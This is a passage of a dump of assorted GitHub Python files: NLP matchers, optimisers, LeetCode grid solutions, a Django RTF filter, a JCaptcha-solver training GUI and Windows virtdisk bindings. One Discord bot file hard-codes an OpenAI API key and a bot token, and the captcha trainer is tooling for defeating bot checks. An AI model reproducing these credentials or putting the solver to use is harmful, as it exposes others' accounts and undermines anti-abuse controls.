[pattern])\n\ndoc = nlp(\"Thsi is email address : abc@winner.com\")\nmatches = matcher(doc)\n# print(matches)\n\n# matches[0][0] is a lexeme\n# print(f'Label = {nlp.vocab[matches[0][0]].text}')\n\nwith open (\"data\\wiki_mlk.txt\", \"r\") as f:\n text = f.read()\n\n#grabing all proper noun followed with verb\nmatcher2 = Matcher(nlp.vocab)\npattern2 = [\n {\"POS\":\"PROPN\", \"OP\":\"+\"}, {\"POS\":'VERB'}\n # {\"IS_ALPHA\": True}, {\"IS_DIGIT\": True, \"OP\": \"+\"}\n]\nmatcher2.add(\"PROPER_NOUNS\",[pattern2], greedy='LONGEST')\ndoc2 = nlp(text)\nmatches2 = matcher2(doc2)\n# print(len(matches2))\nmatches2.sort(key=lambda x : x[1])\n# for match in matches2[:10]:\n# print(match, doc2[match[1]:match[2]])\n\n\n\n#grabbing speaker name who said the quote\n\nwith open(\"data/alice.json\",'r') as f:\n # for json file replace \\ -> / тнР\n data = json.load(f)\ntext3 = data[0][2][0]\ntext3 = text3.replace(\"`\",\"'\")\nprint(text3)\n\nspeak_lemmas = [\"think\", \"say\", \"tell\"]\n\nmatcher3 = Matcher(nlp.vocab)\npattern3 = [\n {\"ORTH\":\"'\"},\n {\"IS_ALPHA\": True, \"OP\": \"+\"}, \n {\"IS_PUNCT\":True, \"OP\": \"*\"},\n {\"ORTH\":\"'\"},\n {\"POS\":'VERB', \"LEMMA\":{'IN': speak_lemmas}},\n {\"POS\":\"PROPN\", \"OP\":\"+\"},\n {\"ORTH\":\"'\"},\n {\"IS_ALPHA\": True, \"OP\": \"+\"}, \n {\"IS_PUNCT\":True, \"OP\": \"*\"},\n {\"ORTH\":\"'\"}\n]\npattern4 = [{'ORTH': \"'\"},\n {'IS_ALPHA': True, \"OP\": \"+\"},\n {'IS_PUNCT': True, \"OP\": \"*\"}, {'ORTH': \"'\"},\n {\"POS\": \"VERB\", \"LEMMA\": {\"IN\": speak_lemmas}},\n {\"POS\": \"PROPN\", \"OP\": \"+\"}\n ]\npattern5 = [{\"POS\": \"PROPN\", \"OP\": \"+\"},\n{\"POS\": \"VERB\", \"LEMMA\": {\"IN\": speak_lemmas}},\n {'ORTH': \"'\"}, {'IS_ALPHA': True, \"OP\": \"+\"},\n {'IS_PUNCT': True, \"OP\": \"*\"},\n {'ORTH': \"'\"}\n ]\nmatcher3.add(\"PROPER_NOUNS\",[pattern3, pattern4, pattern5], greedy='LONGEST')\ndoc3 = nlp(text3)\nmatches3 = matcher3(doc3)\nprint(len(matches3))\nmatches3.sort(key=lambda x : x[1])\nfor match in matches3[:10]:\n print(match, doc3[match[1]:match[2]])","repo_name":"jigarsiddhpura/NLPwithSpacy","sub_path":"Matcher.py","file_name":"Matcher.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10745994553","text":"import pandas as pd\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import style\r\ndef f(w,b,x):\r\n\treturn 1.0 / (1.0 + np.exp(-(w*x + b)))\r\ndef grad_w(w,b,x,y):\r\n\tfx = f(w,b,x)\r\n\treturn (fx - y ) * fx * (1 - fx) * x\r\n\r\ndef grad_b(w,b,x,y):\r\n\tfx = f(w,b,x)\r\n\treturn (fx - y ) * fx * (1 - fx)\r\n\r\ndef loss(w,b):\r\n\terror = 0\r\n\tfor x,y in zip(X,Y):\r\n\t\tfx = f(w,b,x)\r\n\t\terror += 0.5 * (fx - y) ** 2\r\n\t\treturn error\r\n\r\n\r\nfilename = 'data.csv'\r\ndf = pd.read_csv(filename)\r\nX = df ['x']\r\nY = df ['y']\r\n\r\ninit_w,init_b=1,1\r\nw_b_dw_db = [(init_w,init_b,0,0)]\r\nw_history,b_history,error_history,losshistory=[],[],[],[]\r\nw,b,eta,mini_batch_size,num_points_seen = init_w,init_b,0.01,10,0 \r\nm_w,m_b,v_w,v_b,eps,beta1,beta2,max_epochs=0,0,0,0,1e-8,0.9,0.99,1000\r\n\r\nfor i in range (max_epochs):\r\n\tdw,db = 0,0\r\n\tfor x,y in zip(X,Y):\r\n\t\tdw+= grad_w(w,b,x,y)\r\n\t\tdb+= grad_b(w,b,x,y)\r\n\t\t\r\n\tm_w = beta1 * m_w + (1 - beta1) * dw\r\n\tm_b = beta1 * m_b + (1 - beta1) * db\r\n\t\t\r\n\tv_w = beta2 * v_w + (1 - beta2) * dw ** 2\r\n\tv_b = beta2 * v_b + (1 - beta2) * db ** 2\r\n\t\t\r\n\tm_w_hat = m_w / (1 - math.pow(beta1,i+1))\r\n\tm_b_hat = m_b / (1 - math.pow(beta1,i+1))\r\n\t\t\r\n\tv_w_hat = v_w / (1 - math.pow(beta2,i+1))\r\n\tv_b_hat = v_b / (1 - math.pow(beta2,i+1))\r\n\t\t\r\n\tw = w - (eta / np.sqrt(v_w_hat + eps))* m_w_hat\r\n\tb = b - (eta / np.sqrt(v_b_hat + eps)) * m_b_hat \r\n\tr = loss(w,b)\r\n\tprint (r)\r\n\tlosshistory.append(r)\r\n\tplt.plot(losshistory)\r\n\t\r\nplt.show()\r\n\r\n\t\t\r\n\t\t\t\r\n\r\n\t\r\n\r\n\r\n\t\r\n\r\n\t\r\n","repo_name":"princeamitlali/gradient_descent","sub_path":"adamgradientdescent.py","file_name":"adamgradientdescent.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15034551158","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef extend_matrix(X):\n return np.c_[np.ones((X.shape[0], 1)), X]\n\ndef normal_eq(Xe, y):\n return np.linalg.inv(Xe.T.dot(Xe)).dot(Xe.T).dot(y)\n\ndef normalize(x_to_norm, X):\n return (x_to_norm - np.mean(X, axis=0, dtype=np.float64)) / np.std(X, axis=0, dtype=np.float64)\n\ndef cost(Xe, y, beta):\n j = np.dot(Xe, beta)-y\n return (j.T.dot(j))/Xe.shape[0]\n\n# def gradient_descent(X, y, a = 0.0002, n = 20000000):\ndef gradient_descent(X, y, a = 0.01, n = 1000, plot = False):\n \"\"\"Perform gradient descent on the given X\"\"\"\n w = np.zeros(X.shape[1])\n costs = []\n for i in range(n):\n j = (X.T).dot(X.dot(w) - y)\n w = w - (a * j) / X.shape[0]\n costs.append(cost(X, y, w))\n if plot:\n plt.figure()\n plt.plot(range(n), costs)\n return w\n\n\ndef main():\n data = np.loadtxt(\"A2_datasets_2022/girls_height.csv\")\n\n X = data[:, 1:3]\n y = data[:, 0]\n\n plt.figure(\"Girl, mom\")\n plt.scatter(X[:, 0], y, marker=\".\", c=\"None\", edgecolors=\"black\")\n plt.xlabel(\"mom height\")\n plt.ylabel(\"girl height\")\n\n plt.figure(\"Girl, dad\")\n plt.xlabel(\"dad height\")\n plt.ylabel(\"girl height\")\n plt.scatter(X[:, 1], y, marker=\".\", c=\"None\", edgecolors=\"black\")\n\n Xe = extend_matrix(X)\n beta = normal_eq(Xe, y)\n\n print(beta)\n print(cost(Xe, y, beta))\n ug1 = [1, 65, 70]\n\n print(np.dot(ug1, beta))\n\n Xn = normalize(X, X)\n plt.figure(\"Girl, mom, Feature normalization\")\n plt.scatter(Xn[:, 0], y, marker=\".\", c=[[0,0,0,0]], edgecolors=\"black\")\n\n plt.figure(\"Girl, dad, Feature normalization\")\n plt.scatter(Xn[:, 1], y, marker=\".\", c=[[0,0,0,0]], edgecolors=\"black\")\n\n Xne = extend_matrix(Xn)\n beta_n = normal_eq(Xne, y)\n print(beta_n)\n print(cost(Xne, y, beta_n))\n ug1_n = normalize(np.array([65, 70]), X)\n print(np.dot(np.append([1], ug1_n), beta_n))\n # exit()\n print()\n print()\n print()\n\n # Gradient descent on non-normalized X\n # res = gradient_descent(Xe, y, a = 0.0002, n = 20000000)\n \n # Gradient descent on normalized X\n beta_gradient = gradient_descent(Xne, y, a = 0.05, n = 200, plot = True)\n print(\"Normalization, gradient descent:\")\n print(\" Height:\", np.dot(np.append([1], ug1_n), beta_gradient))\n print(\" Cost: \", cost(Xne, y, beta_gradient))\n\n\n\n\n plt.show()\n # print(cost(Xe, y, beta))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"oenstrom/2DV516_A2","sub_path":"exerciseA.py","file_name":"exerciseA.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31065001016","text":"import collections\nfrom typing import List\n\n\ndef longest1():\n def longestLine(M: List[List[int]]) -> int:\n row = collections.defaultdict(int)\n col = collections.defaultdict(int)\n ad = collections.defaultdict(int) # Ascending diagonal\n dd = collections.defaultdict(int) # Descending diagonal\n mx = 0\n for i in range(len(M)):\n for j in range(len(M[0])):\n if not M[i][j]:\n row[i] = col[j] = ad[j + i] = dd[j - i] = 0\n else:\n row[i] += 1\n col[j] += 1\n ad[j + i] += 1\n dd[j - i] += 1\n mx = max(mx, row[i], col[j], ad[j + i], dd[j - i])\n return mx\n\n mat = [[0, 1, 1, 0], [0, 1, 1, 0], [0, 0, 0, 1]]\n longestLine(mat)\n\n\ndef max_connected_island():\n def maxAreaOfIsland(grid: List[List[int]]) -> int:\n\n def explore(grid, r, c) -> int:\n if r >= len(grid) or r < 0 or c >= len(grid[0]) or col < 0:\n return 0\n if grid[r][c] == 0:\n return 0\n grid[r][c] = 0\n return 1 + explore(grid, r - 1, c) + explore(grid, r, c - 1) + explore(grid, r + 1, c) + explore(grid, r, c + 1)\n\n row = len(grid)\n col = len(grid[0])\n max_area = 0\n for i in range(row):\n for j in range(col):\n if grid[i][j] == 1:\n max_area = max(max_area, explore(grid, i, j))\n return max_area\n\n print(maxAreaOfIsland(grid = [[0,0,1,0,0,0,0,1,0,0,0,0,0],[0,0,0,0,0,0,0,1,1,1,0,0,0],[0,1,1,0,1,0,0,0,0,0,0,0,0],[0,1,0,0,1,1,0,0,1,0,1,0,0],[0,1,0,0,1,1,0,0,1,1,1,0,0],[0,0,0,0,0,0,0,0,0,0,1,0,0],[0,0,0,0,0,0,0,1,1,1,0,0,0],[0,0,0,0,0,0,0,1,1,0,0,0,0]]))\n\ndef robot_clean():\n def cleanRoom(robot):\n \"\"\"\n :type robot: Robot\n :rtype: None\n \"\"\"\n dfs(robot, 0, 0, 0, 1, set())\n\n def dfs(robot, x, y, direction_x, direction_y, visited):\n robot.clean()\n visited.add((x, y))\n\n for k in range(4):\n neighbor_x = x + direction_x\n neighbor_y = y + direction_y\n if (neighbor_x, neighbor_y) not in visited and robot.move():\n dfs(robot, neighbor_x, neighbor_y, direction_x, direction_y, visited)\n robot.turnLeft()\n robot.turnLeft()\n robot.move()\n robot.turnLeft()\n robot.turnLeft()\n robot.turnLeft()\n direction_x, direction_y = -direction_y, direction_x\n\n room = [[1, 1, 1, 1, 1, 0, 1, 1], [1, 1, 1, 1, 1, 0, 1, 1], [1, 0, 1, 1, 1, 1, 1, 1], [0, 0, 0, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 1, 1]]\n cleanRoom(room)\n\n\nclass Solution:\n def cleanRoom(self, robot):\n def dfs( robot, x, y, direction_x, direction_y, visited):\n robot.clean()\n visited.add((x, y))\n\n for k in range(4):\n neighbor_x = x + direction_x\n neighbor_y = y + direction_y\n if (neighbor_x, neighbor_y) not in visited and robot.move():\n dfs(robot, neighbor_x, neighbor_y, direction_x, direction_y, visited)\n robot.turnLeft()\n robot.turnLeft()\n robot.move()\n robot.turnLeft()\n robot.turnLeft()\n robot.turnLeft()\n direction_x, direction_y = -direction_y, direction_x\n dfs(robot, 0, 0, 0, 1, set())\n\n\ndef max_min_mat():\n seen = set()\n res=[]\n\n def maximumMinimumPath(grid: List[List[int]]) -> int:\n\n def dfs(grid, i, j):\n queue = collections.deque([(i,j),])\n temp=[]\n\n while queue:\n m,n = queue.popleft()\n temp.append(grid[m][n])\n seen.add((m, n))\n for r, c in (m + 1, n), (m - 1, n), (m, n + 1), (m, n - 1):\n if r>=len(grid[0]) or r<0 or c>=len(grid[0]) or c<0:\n continue\n elif r == len(grid)-1 and c==len(grid[0])-1:\n if res and sum(temp) > sum(res[-1]):\n res.append(temp)\n elif not res:\n res.append(temp)\n elif (r,c) not in seen:\n seen.add((r,c))\n queue.append((r,c))\n\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if (i,j) not in seen:\n dfs(grid, i, j)\n max_sum=0\n idx = 0\n for j, i in enumerate(res):\n if sum(i)>max_sum:\n idx = j\n max_sum = sum(i)\n print(\"Res \", res)\n return min(res[idx])\n\n grid = [[5, 4, 5], [1, 2, 6], [7, 4, 6]]\n print(maximumMinimumPath(grid))\n\ndef shortest_path():\n def shortestPathBinaryMatrix( grid: List[List[int]]) -> int:\n max_row = len(grid) - 1\n max_col = len(grid[0]) - 1\n directions = [(-1, 0), (0, -1), (0, 1), (1, 0)]\n\n # Helper function to find the neighbors of a given cell.\n def get_neighbours(row, col):\n for row_difference, col_difference in directions:\n new_row = row + row_difference\n new_col = col + col_difference\n if not (0 <= new_row <= max_row and 0 <= new_col <= max_col):\n continue\n if grid[new_row][new_col] != 0:\n continue\n yield (new_row, new_col)\n\n # Check that the first and last cells are open.\n if grid[0][0] != 0 or grid[max_row][max_col] != 0:\n return -1\n\n # Set up the BFS.\n queue = collections.deque()\n queue.append((0, 0))\n grid[0][0] = 1\n\n # Carry out the BFS.\n while queue:\n row, col = queue.popleft()\n distance = grid[row][col]\n if (row, col) == (max_row, max_col):\n return distance\n for neighbour_row, neighbour_col in get_neighbours(row, col):\n grid[neighbour_row][neighbour_col] = distance + 1\n queue.append((neighbour_row, neighbour_col))\n\n # There was no path.\n return -1\n\n grid = [[0, 0, 0], [1, 1, 0], [1, 1, 0]]\n print(shortestPathBinaryMatrix(grid))\n\nshortest_path()\n","repo_name":"arpith-kp/interviewrelated","sub_path":"leetcode_matrix.py","file_name":"leetcode_matrix.py","file_ext":"py","file_size_in_byte":6398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31314275247","text":"import sys\nsys.path.append(\"/home/ubuntu/workspace/ml_dev_work\")\nimport pdb\nimport matplotlib as mpl\nmpl.use('Agg')\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy.random import seed\nfrom utils.ml_utils import update_check\n\nIMG_PATH = '/home/ubuntu/workspace/finance/app/static/img/ml_imgs/'\n\nclass AdalineSGD(object):\n \"\"\"ADAptive LInear NEuron classifier.\n\n Parameters\n ------------\n eta : float\n Learning rate (between 0.0 and 1.0)\n n_iter : int\n Passes over the training dataset.\n\n Attributes\n -----------\n w_ : 1d-array\n Weights after fitting.\n errors_ : list\n Number of misclassifications in every epoch.\n shuffle : bool (default: True)\n Shuffles training data every epoch if True to prevent cycles.\n random_state : int (default: None)\n Set random state for shuffling and initializing the weights.\n \n \"\"\"\n def __init__(self, eta=0.01, n_iter=10, shuffle=True, random_state=None):\n self.eta = eta\n self.n_iter = n_iter\n self.w_initialized = False\n self.shuffle = shuffle\n if random_state:\n seed(random_state)\n \n def fit(self, X, y):\n \"\"\" Fit training data.\n\n Parameters\n ----------\n X : {array-like}, shape = [n_samples, n_features]\n Training vectors, where n_samples is the number of samples and\n n_features is the number of features.\n y : array-like, shape = [n_samples]\n Target values.\n\n Returns\n -------\n self : object\n\n \"\"\"\n self._initialize_weights(X.shape[1])\n self.cost_ = []\n for i in range(self.n_iter):\n # data needs to be presented in random order\n if self.shuffle:\n X, y = self._shuffle(X, y)\n cost = []\n for xi, target in zip(X, y):\n # update weights \"on-the-fly\" after each sample unlike regular adaline gradient descent\n # Other than that, very similar to adalineGD\n cost.append(self._update_weights(xi, target))\n avg_cost = sum(cost)/len(y)\n self.cost_.append(avg_cost)\n return self\n\n def partial_fit(self, X, y):\n \"\"\"Fit training data without reinitializing the weights\"\"\"\n # This can be used to continue learning on a model after weights have already been tuned to some extent\n if not self.w_initialized:\n self._initialize_weights(X.shape[1])\n if y.ravel().shape[0] > 1:\n for xi, target in zip(X, y):\n self._update_weights(xi, target)\n else:\n self._update_weights(X, y)\n return self\n\n def _shuffle(self, X, y):\n \"\"\"Shuffle training data\"\"\"\n r = np.random.permutation(len(y))\n return X[r], y[r]\n \n def _initialize_weights(self, m):\n \"\"\"Initialize weights to zeros\"\"\"\n self.w_ = np.zeros(1 + m)\n self.w_initialized = True\n \n def _update_weights(self, xi, target):\n \"\"\"Apply Adaline learning rule to update the weights\"\"\"\n output = self.net_input(xi)\n error = (target - output)\n # Same as adalineGD where the weights are updated even if prediction is right\n self.w_[1:] += self.eta * xi.dot(error)\n self.w_[0] += self.eta * error\n cost = 0.5 * error**2\n print(str(self.w_) + \"----\" + str(xi))\n return cost\n \n def net_input(self, X):\n \"\"\"Calculate net input\"\"\"\n return np.dot(X, self.w_[1:]) + self.w_[0]\n\n def activation(self, X):\n \"\"\"Compute linear activation\"\"\"\n return self.net_input(X)\n\n def predict(self, X):\n \"\"\"Return class label after unit step\"\"\"\n return np.where(self.activation(X) >= 0.0, 1, -1)","repo_name":"mccarvik/python_for_finance","sub_path":"research/ml_analysis/algorithms/adalinesgd.py","file_name":"adalinesgd.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39113736503","text":"import os\nimport discord\nfrom discord.ext import commands\n\n\nimport openai\nimport discord\nfrom discord.ext import commands\n\n# OpenAI API anahtarı ve Discord bot token'ı\nopenai.api_key = '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'\n\n# Discord bot token'ı\n# Discord Intents ayarı\nintents = discord.Intents.default()\nintents.messages = True\nintents.message_content = True\n\nbot = commands.Bot(command_prefix='kodland!', intents=intents)\n\n# Sohbet oturumu için bir dictionary yapısı.\nchat_sessions = {}\n\n@bot.event\nasync def on_ready():\n print(f'{bot.user.name} has connected to Discord!')\n\n@bot.command(name='chat')\nasync def chat(ctx, *, message):\n user_id = str(ctx.author.id)\n\n # Kullanıcının mevcut oturum ID'sini al.\n session_id = chat_sessions.get(user_id)\n\n # Kullanıcının mesajı ile bir mesaj listesi oluştur.\n messages = [\n {\"role\": \"system\", \"content\": \"senin adın Kodland Canlı Destek ve yardım sever bir asistansın, birisi sana adını sorduğunda adım Kodland Canlı Destek Demelisin\"},\n {\"role\": \"user\", \"content\": message}\n ]\n\n # ChatCompletion çağrısı yaparken session_id varsa ekleyin.\n chat_params = {\n \"model\": \"gpt-4\",\n \"messages\": messages\n }\n\n if session_id:\n chat_params[\"session_id\"] = session_id\n\n # ChatCompletion çağrısı.\n response = openai.ChatCompletion.create(**chat_params)\n\n # Cevabı ve yeni oturum ID'sini kaydet.\n # 'choices' içerisinden 'data' ve oradan da 'session_id' anahtarına ulaşılır.\n if 'data' in response['choices'][0]:\n chat_sessions[user_id] = response['choices'][0]['data']['session_id']\n else:\n # İlk yanıtta session_id yoksa, bu bir başlangıç yanıtıdır ve oturum ID'si henüz oluşturulmamış olabilir.\n # Bu durumda, bu kullanıcı için henüz bir session_id yok demektir.\n pass\n\n answer = response['choices'][0]['message']['content']\n\n # Gelen yanıtı Discord'da gönder.\n await ctx.send(answer)\n\n# Botu çalıştır.\nbot.run(\"MTE3MDcyMjQwOTI0Mjk1MTgxMg.GaSf0x.OcM33sEBXjC65xUPicRy48Z65EQBOsF88SADsA\")\n\n","repo_name":"toprakefeeker/Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14805981861","text":"from flask_restful import fields\r\nfrom models.Usuario import usuario_campos\r\n\r\ngrupo_campos = {\r\n 'criador_id': fields.Integer(attribute=\"criador.id\"),\r\n 'dataCriacao': fields.DateTime,\r\n 'descricao': fields.String,\r\n 'participantes': fields.List(fields.Nested(usuario_campos))\r\n}\r\n\r\n'''\r\n Classe Grupo.\r\n'''\r\nclass Grupo():\r\n def __init__(self, criador, nome, dataCriacao, descricao):\r\n self.criador = criador\r\n self.nome = nome\r\n self.dataCriacao = dataCriacao\r\n self.descricao = descricao","repo_name":"RRFreitas/GeekWay","sub_path":"geekway-api/models/Grupo.py","file_name":"Grupo.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70235007528","text":"import encodings\n\nfrom django import template\nfrom django.template.defaultfilters import stringfilter\n\nregister = template.Library()\n\n\n@stringfilter\ndef rtflinebreaks(value):\n \"Converts newlines into RTF \\\\lines\"\n return value.replace(\"\\n\", \"{\\\\line}\")\n\n\nregister.filter(rtflinebreaks)\n\nencoder = encodings.codecs.getencoder(\"1252\")\n\n\ndef unicode_to_rtf(u):\n \"\"\"Replaces all high characters with \\\\u escape sequences,\n assuming a Windows 1252 code page\"\"\"\n # We will assume Windows code page for now (for maxiumum\n # likelihood of compatibility -- RTF only seems to support\n # the first 65535 chars of unicode anyway).\n # The document should have these codes\n # \\ansi\\ansicpg1252\\uc1\n output = []\n for char in u:\n if ord(char) > 127:\n try:\n encoded = encoder(char)\n except UnicodeEncodeError:\n encoded = encoder(\"?\")\n val = ord(encoded[0])\n if val < 256:\n # use \\' method:\n converted = \"\\\\'\" + hex(val)[2:]\n else:\n # Don't even know if this works. The\n # '?' is the alternate rendering, one byte long,\n # to match the '\\uc1' directive\n converted = \"\\\\u%d ?\" % val\n else:\n converted = str(char)\n output.append(converted)\n return \"\".join(output)\n\n\n@stringfilter\ndef rtfescape(value):\n \"Escapes RTF control characters\"\n\n return unicode_to_rtf(value.replace(\"\\\\\", \"\\\\\\\\\").replace(\"{\", \"\\\\{\").replace(\"}\", \"\\\\}\"))\n\n\nregister.filter(rtfescape)\n","repo_name":"cciw-uk/cciw.co.uk","sub_path":"cciw/officers/templatetags/rtf.py","file_name":"rtf.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"22112460333","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom trainer_gui import Ui_MainWindow\nfrom jcaptcha_image import JCaptchaImage, JCaptchaCharacterImage\nimport os, sys\n\n\nclass MessageBox:\n\tdef showMessage_trainingComplete(form):\n\t\tmsg = QtWidgets.QMessageBox(form)\n\t\tmsg.setText('All training data collected and Model trained successfully!')\n\t\tmsg.setWindowTitle('Training complete!')\n\t\tmsg.setWindowIcon(QtGui.QIcon('icon/robot.ico'))\n\t\tmsg.exec_()\n\n\tdef showMessage_emptyTextBox(form):\n\t\tmsg = QtWidgets.QMessageBox(form)\n\t\tmsg.setText('Invalid input data!')\n\t\tmsg.setWindowTitle('Try again!')\n\t\tmsg.setWindowIcon(QtGui.QIcon('icon/robot.ico'))\n\t\tmsg.exec_()\n\n#-------------------------\n\n\nclass TrainerApp:\n\tdef __init__(self):\n\t\tself.images_filenames = os.listdir('Training Images')\n\t\tself.imageName_index = 0\n\t\tself.training_X_outputFile = open('Collected Training Data/training_X.csv', 'w')\n\t\tself.training_Y_outputFile = open('Collected Training Data/training_Y.csv', 'w')\n\t\t#------------------------------\n\t\tapp = QtWidgets.QApplication(sys.argv)\n\t\tself.MainWindow = QtWidgets.QMainWindow()\n\t\tself.UI = Ui_MainWindow()\n\t\tself.UI.setupUi(self.MainWindow, self)\n\t\t#\n\t\tself.__remainingCount = len(self.images_filenames)\n\t\tself.__failedCount = 0\n\t\tself.UI.remaining_label.setText('Remaining: ' + str(self.__remainingCount))\n\t\tself.UI.failed_label.setText('Failed: 0')\n\t\t#\n\t\tself.MainWindow.show()\n\t\tsys.exit(app.exec_())\n\n\tdef storeTrainingData(self):\n\t\tif self.UI.answer_lineEdit.text() == '':\n\t\t\tMessageBox.showMessage_emptyTextBox(self.MainWindow)\n\t\t\treturn\n\t\tif self.imageName_index + 1 >= len(self.images_filenames):\n\t\t\tMessageBox.showMessage_trainingComplete(self.MainWindow)\n\t\t\tself.training_X_outputFile.close()\n\t\t\tself.training_Y_outputFile.close()\n\t\t\treturn\n\t\t#------------------------------\n\t\timg = JCaptchaImage('Training Images/' + self.images_filenames[self.imageName_index])\n\t\timg.treat()\n\t\timg.collect_character_imageList()\n\t\tjcaptcha_char_images = img.get_JCaptchaCharacterImage_List()\n\t\tanswer_text = self.UI.answer_lineEdit.text()\n\t\t#------------------------------\n\t\ttraining_X = ''\n\t\ttraining_Y = ''\n\t\t#---\n\t\tif len(jcaptcha_char_images) != len(answer_text):\n\t\t\topen('log.txt', 'a').write('Issue with ' + self.images_filenames[self.imageName_index] + '\\n')\n\t\t\tself.__failedCount += 1\n\t\t\tself.__remainingCount -= 1\n\t\t\tself.UI.failed_label.setText('Failed: ' + str(self.__failedCount))\n\t\t\tself.UI.remaining_label.setText('Remaining: ' + str(self.__remainingCount))\n\t\telse:\n\t\t\tfor i in range(len(jcaptcha_char_images)):\n\t\t\t\ttraining_X += jcaptcha_char_images[i].get_CSV() + '\\n'\n\t\t\t\ttraining_Y += answer_text[i] + '\\n'\n\t\t\tself.training_X_outputFile.write(training_X)\n\t\t\tself.training_Y_outputFile.write(training_Y)\n\t\t#------------------------------\n\t\tself.imageName_index += 1\n\t\tself.UI.captchaBox.setPixmap(QtGui.QPixmap(\"Training Images/\" + self.images_filenames[self.imageName_index]))\n\t\tself.UI.answer_lineEdit.setText('')\n\t\t#\n\t\tself.__remainingCount -= 1\n\t\tself.UI.remaining_label.setText('Remaining: ' + str(self.__remainingCount))\n\n\n#####\n#####\n#####\n\ndef main():\n\tif os.path.isfile('log.txt'):\n\t\tos.remove('log.txt')\n\ttrainer = TrainerApp()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"ali-sajjad-rizavi/JCaptcha-Solver","sub_path":"Training/trainer.pyw","file_name":"trainer.pyw","file_ext":"pyw","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"39795595010","text":"import ctypes\nfrom .wtypes import (\n BOOL,\n DWORD,\n GUID,\n LONG,\n POINTER,\n PVOID,\n PWSTR,\n ULARGE_INTEGER,\n ULONG,\n )\nfrom . import ref, fun_fact, raise_on_err\n\nfrom .kernel import KHANDLE, PKHANDLE\n\n_vdisk = ctypes.WinDLL(\"virtdisk.dll\")\n\n################################################################################\n\nATTACH_VIRTUAL_DISK_FLAG_NONE = 0\nATTACH_VIRTUAL_DISK_FLAG_READ_ONLY = 0x1\nATTACH_VIRTUAL_DISK_FLAG_NO_DRIVE_LETTER = 0x2\nATTACH_VIRTUAL_DISK_FLAG_PERMANENT_LIFETIME = 0x4\nATTACH_VIRTUAL_DISK_FLAG_NO_LOCAL_HOST = 0x8\nATTACH_VIRTUAL_DISK_FLAG_NO_SECURITY_DESCRIPTOR = 0x10\nATTACH_VIRTUAL_DISK_FLAG_BYPASS_DEFAULT_ENCRYPTION_POLICY = 0x20\nATTACH_VIRTUAL_DISK_FLAG_NON_PNP = 0x40\nATTACH_VIRTUAL_DISK_FLAG_RESTRICTED_RANGE = 0x80\nATTACH_VIRTUAL_DISK_FLAG_SINGLE_PARTITION = 0x100\nATTACH_VIRTUAL_DISK_FLAG_REGISTER_VOLUME = 0x200\n\nVIRTUAL_DISK_ACCESS_NONE = 0\nVIRTUAL_DISK_ACCESS_ATTACH_RO = 0x10000\nVIRTUAL_DISK_ACCESS_ATTACH_RW = 0x20000\nVIRTUAL_DISK_ACCESS_DETACH = 0x40000\nVIRTUAL_DISK_ACCESS_GET_INFO = 0x80000\nVIRTUAL_DISK_ACCESS_CREATE = 0x100000\nVIRTUAL_DISK_ACCESS_METAOPS = 0x200000\nVIRTUAL_DISK_ACCESS_READ = 0xd0000\nVIRTUAL_DISK_ACCESS_ALL = 0x3f0000\nVIRTUAL_DISK_ACCESS_WRITABLE = 0x320000\n\nOPEN_VIRTUAL_DISK_FLAG_NONE = 0\nOPEN_VIRTUAL_DISK_FLAG_NO_PARENTS = 0x1\nOPEN_VIRTUAL_DISK_FLAG_BLANK_FILE = 0x2\nOPEN_VIRTUAL_DISK_FLAG_BOOT_DRIVE = 0x4\nOPEN_VIRTUAL_DISK_FLAG_CACHED_IO = 0x8\nOPEN_VIRTUAL_DISK_FLAG_CUSTOM_DIFF_CHAIN = 0x10\nOPEN_VIRTUAL_DISK_FLAG_PARENT_CACHED_IO = 0x20\nOPEN_VIRTUAL_DISK_FLAG_VHDSET_FILE_ONLY = 0x40\nOPEN_VIRTUAL_DISK_FLAG_IGNORE_RELATIVE_PARENT_LOCATOR = 0x80\nOPEN_VIRTUAL_DISK_FLAG_NO_WRITE_HARDENING = 0x100\nOPEN_VIRTUAL_DISK_FLAG_SUPPORT_COMPRESSED_VOLUMES = 0x200\n\nOPEN_VIRTUAL_DISK_VERSION_UNSPECIFIED = 0\nOPEN_VIRTUAL_DISK_VERSION_1 = 1\nOPEN_VIRTUAL_DISK_VERSION_2 = 2\nOPEN_VIRTUAL_DISK_VERSION_3 = 3\n\nDETACH_VIRTUAL_DISK_FLAG_NONE = 0\n\nATTACH_VIRTUAL_DISK_VERSION_1 = 1\nATTACH_VIRTUAL_DISK_VERSION_2 = 2\n\n################################################################################\n\nclass VIRTUAL_STORAGE_TYPE(ctypes.Structure):\n _fields_ = (\n (\"DeviceId\", ULONG),\n (\"VendorId\", GUID),\n )\nPVIRTUAL_STORAGE_TYPE = POINTER(VIRTUAL_STORAGE_TYPE)\n\n################################################################################\n\nclass _OVDP_VERSION1(ctypes.Structure):\n _fields_ = (\n (\"RWDepth\", ULONG),\n )\n\nclass 